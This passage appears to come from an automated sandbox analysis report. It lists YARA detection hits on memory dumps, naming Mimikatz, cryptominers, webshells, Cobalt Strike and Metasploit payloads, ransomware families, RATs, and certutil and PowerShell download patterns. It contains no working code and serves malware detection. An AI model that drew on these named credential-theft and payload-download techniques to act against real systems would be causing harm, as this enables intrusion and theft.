p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6349431685.00000197A36F1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, Author: Joe Security Rule: APT9002Strings, Description: 9002 Identifying Strings, Source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, Author: Seth Hardy Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6340510692.00000197A4B3C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Buran, Description: Yara detected Buran Ransomware, Source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Gocoder_3, Description: Yara detected Gocoder ransomware, Source: 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, Author: Florian Roth Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, Author: Joe Security Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6332385174.00000197A4180000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, Author: Joe Security Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp, Author: Joe Security Rule: Msfpayloads_msf_psh, Description: Metasploit Payloads - file msf-psh.vba, Source: 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp, Author: Florian Roth Rule: TA17_293A_malware_1, Description: inveigh pen testing tools & related artifacts, Source: 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp, Author: US-CERT Code Analysis Team (modified by Florian Roth) Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6279246359.00000197A4A35000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6356649431.00000197A36F1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6300924417.00000197A4314000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp, Author: Joe Security Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, Author: USG Rule: IMPLANT_5_v3, Description: XTunnel Implant by APT28, Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, Author: US CERT Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_NoCry, Description: Yara detected NoCry Ransomware, Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, Author: Joe Security Rule: malware_red_leaves_memory, Description: Red Leaves C&C left in memory, use with Volatility / Rekall, Source: 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp, Author: David Cannings Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6354837161.00000197A4180000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000024.00000003.6341599132.00000197A3621000.00000004.00000001.sdmp, Author: Cylance Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6350988033.00000197A3FA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6314037891.00000197A4314000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp, Author: Florian Roth Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, Author: Joe Security Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, Author: Florian Roth Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_gogoogle, Description: Yara detected GoGoogle ransomware, Source: 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000024.00000003.6339772836.00000197A3E9A000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp, Author: Joe Security Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6330651040.00000197A36F1000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, Author: Joe Security Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, Author: FireEye Rule: REDLEAVES_CoreImplant_UniqueStrings, Description: Strings identifying the core REDLEAVES RAT in its deobfuscated state, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: USG Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: Florian Roth Rule: CobaltStrike_MZ_Launcher, Description: Detects CobaltStrike MZ header ReflectiveLoader launcher, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: yara@s3c.za.net Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: Joe Security Rule: Ham_backdoor, Description: unknown, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: Cylance Spear Team Rule: malware_red_leaves_generic, Description: Red Leaves malware, related to APT10, Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, Author: David Cannings Rule: webshell_php_base64_encoded_payloads, Description: php webshell containing base64 encoded payload, Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_hidden_tear, Description: Yara detected HiddenTear ransomware, Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp, Author: Joe Security Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, Author: Florian Roth Rule: HackTool_Samples, Description: Hacktool, Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, Author: unknown Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 